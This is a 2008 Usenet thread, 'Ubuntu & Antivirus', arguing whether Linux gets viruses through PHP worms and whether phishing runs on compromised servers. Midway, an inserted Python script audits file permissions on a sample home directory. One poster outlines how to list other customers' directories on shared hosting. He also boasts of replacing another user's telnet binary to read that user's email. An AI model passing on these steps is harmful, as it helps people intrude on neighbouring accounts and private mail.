    >>>>>> they are all hosted on Linux servers running cPanel.
    >>>>>
    >>>>> If no one knows what code you are writing, you most likely will be
    >>>>> safe from automated attacks. But if your hand written code has
    >>>>> vulnerabilities, and someone wants to hack you specifically, chances
    >>>>> are good that you will be hacked.
    >>>>
    >>>> Well, it hasn't happened in many years...
    >>>>
    >>>>> Also if you are on shared hosting, most likely other users of that
    >>>>> hosting would be able to see the source code of your script.
    >>>>
    >>>> I disagree with that statement.
    >>>
    >>> Give it a try. Try to write a PHP or perl CGI script that would get a
    >>> listing of the directory one level above your home directory. Then see
    >>> if subdirectories of that place have known sub-subdirectories such as
    >>> public_html or whatever you can guess based on the naming convention
    >>> that your ISP has for mapping websites to directories.
    >>>
    >>> Then find out the websites that run on the same IP as you (there are
    >>> web sites to help you do this).
    >>>
    >>> Go from there.
    >>>
    >>>>> I hacked a user of panix.com 12 years ago
    >>>>
    >>>> ..and the security hole you used hasn't been patched yet, right?
    >>>
    >>> My hack was based on a user mistake and not on any security hole.
    >>>
    >>>
    >>>>> because they set up wrong permissions on telnet binary that they
    >>>>> uploaded to their account ~/bin/telnet (telnetting to outside was
    >>>>> against panix policy and /usr/bin/telnet was mode 710). I then
    >>>>> changed it to an altered version that was to run a script that I wrote
    >>>>> to set other permissions to read his email. I am not a pro hacker
    >>>>> either, it was just a USENET asshole on whom I needed some intel.
    >>>>
    >>>> Ah. So it wasn't a Linux vuln, or a PHP vuln, but a user shooting
    >>>> himself in the foot by not setting up his web site or host correctly.
    >>>> Still not a Linux vuln.
    >>>
    >>> No. But it is a good illustration that getting ****y is a mistake.
    >>>
    >>>>> If you are on shared hosting, source code of your scripts is almost
    >>>>> publicly available (to anyone with $12 to sign up for a month), as,
    >>>>> most likely, are your database credentials.
    >>>>
    >>>> I've used shared hosting for ten years and never been hacked, nor have
    >>>> my databases.
    >>>
    >>> So give the above experiment a try.
    >>>
    >>>>>> Your references would be valid (except for the Linux part) for web
    >>>>>> authors still using Matt Wright's ten year old insecure formmail
    >>>>>> script, for example.
    >>>>>
    >>>>> And a lot of other things.
    >>>>
    >>>> I did say Matt's well-known bad script, "for example." I regularly get
    >>>> requests for "cgi/formmail.pl" - which of course does not exist.
    >>>>
    >>>>> Security is not simple and PHP is making it very difficult to be
    >>>>> secure.
    >>>>
    >>>> No, of course it is not simple. But your arguments are flawed,
    >>>> especially when trying to prove "it's a Linux virus."
    >>>>
    >>>>> Linux systems are not impervious to viruses. To think otherwise is to
    >>>>> delude oneself and to invite trouble.
    >>>>
    >>>> I've been using Linux at home for about two years and haven't found any
    >>>> problem with my computers...
    >>>>
    >>>
    >>> I have been using Linux for 13 years (since 1995) and was not hacked
    >>> either.
    >>>
    >>> i
    >>
    >> Then you're blowing smoke, aren't you? Why? is the next question.
    >>
    >> Cheers.
    >>
    >
    > I am trying to educate you. Don't think that just because you have
    > Linux installed, you will never get hacked. That's dangerous
    > thinking that is incorrect and leads to trouble.
    >

    You can start by trying to educate yourself. Mission Impossible?

    > Try this:
    >
    > http://www.theregister.co.uk/2007/10...nline_banking/
    >
    > ``At one point, he said, the bank spent a month as the largest
    > phishing target in the country, and in fighting this ongoing problem,
    > it has shutdown countless phishing sites surreptitiously installed on
    > countless machines across the net.
    >
    > "These things are incredibly sophisticated, and when they take over a
    > computer, most [users] don't know it," he said. "With every single
    > phishing site [Washington Mutual has] shutdown, not one person was
    > aware been aware that their machine was compromised and used for
    > phishing. That includes university servers and company servers and
    > personal PCs and all sorts of things."
    >
    > More interesting is that most of the compromised machines were not
    > Windows machines. "The vast majority of [the phishing sites] we saw
    > were on rootkit-ed Linux boxes, which was rather startling. We
    > expected a predominance of Microsoft boxes and that wasn't the case."
    >
    > This pleased Microsoft's head of Silicon Valley PR, who served as a
    > conference sponsor.
    >
    > Botnets are obviously a big problem for eBay as well, but Cullinane
    > wouldn't quite say how big. "We see botnet attacks that are massive in
    > their size and scope. We did a preliminary analysis and found over - I
    > guess I'm not supposed to say that, what the number is - but we found
    > a huge number of bots aimed specifically at eBay, trying to do things
    > specifically to us."
    >
    > The problem has become so bad that eBay operates under the assumption
    > that every personal PC is infected, he says. "With the desktop, we're
    > starting to run on the assumption that anyone who's trying to contact
    > us from their own personal desktop is probably coming from a
    > compromised computer." ®''
    > i


    Totally irrelevant. Nothing to do with Linux getting viruses. Possibly has
    something to do with DOS attacks from compromised Windoze boxes, but that's
    another story.

    Cheers.

    --
    The world can't afford the rich.

    Q: What OS is built for lusers?
    A: Which one requires running lusermgr.msc to create them?

    Francis (Frank) adds a new "gadget" to his Vista box ...
    Download it here: http://tinyurl.com/2hnof6



  19. Re: Ubuntu & Antivirus

    On 2008-03-28, NoStop wrote:
    > Ignoramus17842 wrote:
    >
    >> On 2008-03-27, NoStop wrote:
    >>> Ignoramus17842 wrote:
    >>>
    >>>> On 2008-03-27, Beauregard T. Shagnasty wrote:
    >>>>> Ignoramus17842 wrote:
    >>>>>
    >>>>>> Beauregard T. Shagnasty wrote:
    >>>>>>> Ignoramus17842 wrote:
    >>>>>>>> NoStop wrote:
    >>>>>>>>> Ignoramus17842 wrote:
    >>>>>>>>>> I am sorry to burst anyone's bubble, but there are linux viruses.
    >>>>>>>>>> A lot of them spread via bad PHP software. I have seen some in
    >>>>>>>>>> action. That's the reason why I avoid PHP where possible.
    >>>>>>>>>>
    >>>>>>>>> You're not bursting my bubble. Prove it. Show us a linux virus that
    >>>>>>>>> spreads via bad PHP software.
    >>>>>>>>
    >>>>>>>> http://www.theregister.co.uk/2006/02/20/linux_worm/
    >>>>>>>> http://vil.nai.com/vil/content/v_136821.htm
    >>>>>>>>
    >>>>>>>> http://www.pandasecurity.com/enterpr...prod=&entorno=
    >>>>>>>
    >>>>>>> Those old references do not actually prove these are Linux viruses or
    >>>>>>> worms. It would seem that if a Windows web server was running
    >>>>>>> three-year old unpatched PHP or CGI script, the result would be the
    >>>>>>> same.
    >>>>>>
    >>>>>> Sure. If a windows server was running that crap, it would be infected
    >>>>>> too. Which is the whole point.
    >>>>>
    >>>>> But it was not the point you were alluding to, which is, "but there are
    >>>>> linux viruses." No, they are web server application software
    >>>>> vulnerabilities, and not Linux vulns - or viruses.
    >>>>
    >>>> If Linux runs it, it is a Linux problem. phpbb is a part of some Linux
    >>>> distros.
    >>>>
    >>>>> A hacking attempt is not a virus, either. A PHP (Perl, ASP, C++,
    >>>>> DotNet, etc) security hole is not a virus, either.
    >>>>>
    >>>>> I would define a virus as a self-replicating 'program'.
    >>>>
    >>>> That's exactly what they are.
    >>>>
    >>>> They exploit the holes, start running on the hacked servers and look
    >>>> for more servers to hack.
    >>>>
    >>>>>>> Notice too, from your third link, that nearly all of the vulns are
    >>>>>>> cgi scripts. Still nothing to do with Linux.
    >>>>>>
    >>>>>> It has everything to do with linux if they run on Linux.
    >>>>>
    >>>>> See above. Hacking attempts do not "run on Linux."
    >>>>
    >>>> Yes they do. They run on those hacked servers.
    >>>>
    >>>>>>>> I run a webserver and frequently see those worms probing my
    >>>>>>>> webserver. I do not get infected since I have an anti-PHP policy.
    >>>>>>>
    >>>>>>> Does that mean you don't use PHP in the sites you write? Or don't
    >>>>>>> visit sites made with PHP?
    >>>>>>
    >>>>>> That means that I do not use PHP on any server that I host, with the
    >>>>>> exception of mediawiki.
    >>>>>
    >>>>> ..so "I do not use PHP" is not true, then. If you use that wiki, PHP
    >>>>> is installed - and available - on your server. You'd better be careful!
    >>>>
    >>>> I am trying to be careful indeed and do not run any PHP stuff other
    >>>> than Mediawiki.
    >>>>
    >>>>>>> I use hand-coded PHP for all my sites, and with no third-party
    >>>>>>> scripts or "cgi", and have yet to discover a vulnerability. Yes,
    >>>>>>> they are all hosted on Linux servers running cPanel.
    >>>>>>
    >>>>>> If no one knows what code you are writing, you most likely will be
    >>>>>> safe from automated attacks. But if your hand written code has
    >>>>>> vulnerabilities, and someone wants to hack you specifically, chances
    >>>>>> are good that you will be hacked.
    >>>>>
    >>>>> Well, it hasn't happened in many years...
    >>>>>
    >>>>>> Also if you are on shared hosting, most likely other users of that
    >>>>>> hosting would be able to see the source code of your script.
    >>>>>
    >>>>> I disagree with that statement.
    >>>>
    >>>> Give it a try. Try to write a PHP or perl CGI script that would get a
    >>>> listing of the directory one level above your home directory. Then see
    >>>> if subdirectories of that place have known sub-subdirectories such as
    >>>> public_html or whatever you can guess based on the naming convention
    >>>> that your ISP has for mapping websites to directories.
    >>>>
    >>>> Then find out the websites that run on the same IP as you (there are
    >>>> web sites to help you do this).
    >>>>
    >>>> Go from there.
    >>>>
    >>>>>> I hacked a user of panix.com 12 years ago
    >>>>>
    >>>>> ..and the security hole you used hasn't been patched yet, right?
    >>>>
    >>>> My hack was based on a user mistake and not on any security hole.
    >>>>
    >>>>
    >>>>>> because they set up wrong permissions on telnet binary that they
    >>>>>> uploaded to their account ~/bin/telnet (telnetting to outside was
    >>>>>> against panix policy and /usr/bin/telnet was mode 710). I then
    >>>>>> changed it to an altered version that was to run a script that I wrote
    >>>>>> to set other permissions to read his email. I am not a pro hacker
    >>>>>> either, it was just a USENET asshole on whom I needed some intel.
    >>>>>
    >>>>> Ah. So it wasn't a Linux vuln, or a PHP vuln, but a user shooting
    >>>>> himself in the foot by not setting up his web site or host correctly.
    >>>>> Still not a Linux vuln.
    >>>>
    >>>> No. But it is a good illustration that getting ****y is a mistake.
    >>>>
    >>>>>> If you are on shared hosting, source code of your scripts is almost
    >>>>>> publicly available (to anyone with $12 to sign up for a month), as,
    >>>>>> most likely, are your database credentials.
    >>>>>
    >>>>> I've used shared hosting for ten years and never been hacked, nor have
    >>>>> my databases.
    >>>>
    >>>> So give the above experiment a try.
    >>>>
    >>>>>>> Your references would be valid (except for the Linux part) for web
    >>>>>>> authors still using Matt Wright's ten year old insecure formmail
    >>>>>>> script, for example.
    >>>>>>
    >>>>>> And a lot of other things.
    >>>>>
    >>>>> I did say Matt's well-known bad script, "for example." I regularly get
    >>>>> requests for "cgi/formmail.pl" - which of course does not exist.
    >>>>>
    >>>>>> Security is not simple and PHP is making it very difficult to be
    >>>>>> secure.
    >>>>>
    >>>>> No, of course it is not simple. But your arguments are flawed,
    >>>>> especially when trying to prove "it's a Linux virus."
    >>>>>
    >>>>>> Linux systems are not impervious to viruses. To think otherwise is to
    >>>>>> delude oneself and to invite trouble.
    >>>>>
    >>>>> I've been using Linux at home for about two years and haven't found any
    >>>>> problem with my computers...
    >>>>>
    >>>>
    >>>> I have been using Linux for 13 years (since 1995) and was not hacked
    >>>> either.
    >>>>
    >>>> i
    >>>
    >>> Then you're blowing smoke, aren't you? Why? is the next question.
    >>>
    >>> Cheers.
    >>>
    >>
    >> I am trying to educate you. Don't think that just because you have
    >> Linux installed, you will never get hacked. That's dangerous
    >> thinking that is incorrect and leads to trouble.
    >>
    > You can start by trying to educate yourself. Mission Impossible?
    >
    >> Try this:
    >>
    >> http://www.theregister.co.uk/2007/10...nline_banking/
    >>
    >> ``At one point, he said, the bank spent a month as the largest
    >> phishing target in the country, and in fighting this ongoing problem,
    >> it has shutdown countless phishing sites surreptitiously installed on
    >> countless machines across the net.
    >>
    >> "These things are incredibly sophisticated, and when they take over a
    >> computer, most [users] don't know it," he said. "With every single
    >> phishing site [Washington Mutual has] shutdown, not one person was
    >> aware been aware that their machine was compromised and used for
    >> phishing. That includes university servers and company servers and
    >> personal PCs and all sorts of things."
    >>
    >> More interesting is that most of the compromised machines were not
    >> Windows machines. "The vast majority of [the phishing sites] we saw
    >> were on rootkit-ed Linux boxes, which was rather startling. We
    >> expected a predominance of Microsoft boxes and that wasn't the case."
    >>
    >> This pleased Microsoft's head of Silicon Valley PR, who served as a
    >> conference sponsor.
    >>
    >> Botnets are obviously a big problem for eBay as well, but Cullinane
    >> wouldn't quite say how big. "We see botnet attacks that are massive in
    >> their size and scope. We did a preliminary analysis and found over - I
    >> guess I'm not supposed to say that, what the number is - but we found
    >> a huge number of bots aimed specifically at eBay, trying to do things
    >> specifically to us."
    >>
    >> The problem has become so bad that eBay operates under the assumption
    >> that every personal PC is infected, he says. "With the desktop, we're
    >> starting to run on the assumption that anyone who's trying to contact
    >> us from their own personal desktop is probably coming from a
    >> compromised computer." ''
    >> i
    >
    > Totally irrelevant. Nothing to do with Linux getting viruses. Possibly has
    > something to do with DOS attacks from compromised Windoze boxes, but that's
    > another story.
    >


    Did you understand that phishing websites were running on compromised
    Linux servers?

    DOS attacks were not at all mentioned in the article.

    i
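
The permission mistakes raised in this thread (a user-uploaded `~/bin/telnet` that another account could replace, and scripts and database credentials readable by other accounts on a shared host) can be checked from the account owner's side. The following is an added example, not part of any post in the thread: a small audit of one's own home directory, run here against a constructed sample layout. The credential file names in `SECRET_NAMES` and the sample tree are assumptions, and which findings matter depends on how the host runs its web server.

```python
import os
import stat
import tempfile

# Assumed file names that typically hold database credentials.
SECRET_NAMES = {"LocalSettings.php", "config.php", ".my.cnf"}


def audit_tree(root):
    """Return sorted (relative_path, issue) pairs for risky permission bits."""
    paths = [root]
    for dirpath, dirnames, filenames in os.walk(root):
        paths += [os.path.join(dirpath, n) for n in dirnames + filenames]
    findings = []
    for path in paths:
        st = os.lstat(path)
        if stat.S_ISLNK(st.st_mode):
            continue  # a symlink's own mode bits are not used for access checks
        rel = os.path.relpath(path, root)
        mode = stat.S_IMODE(st.st_mode)
        if mode & stat.S_IWOTH:
            findings.append((rel, "world-writable"))
        elif stat.S_ISREG(st.st_mode) and mode & stat.S_IWGRP and mode & stat.S_IXUSR:
            findings.append((rel, "group-writable executable"))
        if stat.S_ISDIR(st.st_mode) and mode & stat.S_IROTH:
            findings.append((rel, "world-listable directory"))
        if os.path.basename(path) in SECRET_NAMES and mode & stat.S_IROTH:
            findings.append((rel, "world-readable credentials file"))
    return sorted(findings)


def build_sample_home(base):
    """Create a constructed sample account layout with known modes."""
    home = os.path.join(base, "home_user")
    files = {
        "bin/telnet": 0o777,                     # anyone can replace this binary
        "bin/backup.sh": 0o770,                  # group members can replace it
        "public_html/LocalSettings.php": 0o644,  # credentials readable by all
        "public_html/index.php": 0o640,
    }
    for rel, mode in files.items():
        path = os.path.join(home, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write("# constructed sample file\n")
        os.chmod(path, mode)
    for sub, mode in (("", 0o711), ("bin", 0o711), ("public_html", 0o755)):
        os.chmod(os.path.join(home, sub), mode)
    return home


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        print(audit_tree(build_sample_home(tmp)))
```

Pointing `audit_tree` at a real home directory reports the same four classes of finding; tightening the modes (for example `chmod 700` on private binaries and `chmod 600` on credential files) clears them.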

  20. Re: Ubuntu & Antivirus

    Ignoramus17842 wrote:

    > Did you understand that phishing websites were running on compromised
    > Linux servers?



    Phishing sites are set up to phish. It matters not on what OS the
    Webserver runs.

    The Linux servers aren't "compromised" at all. They are designed to
    phish. The phishers just happened to choose a good OS for their shady
    operation.

    Your grasp of "phishing" is just as irrelevant as your grasp of "virus."

    Please spend some time learning something and stop wasting everybody
    else's time.


    --
    John

    No Microsoft, Apple, Intel, Trend Micro, nor Ford products were used in the preparation or transmission of this message.

    The EULA sounds like it was written by a team of lawyers who want to tell me what I can't do. The GPL sounds like it was written by a human being, who wants me to know what I can do.
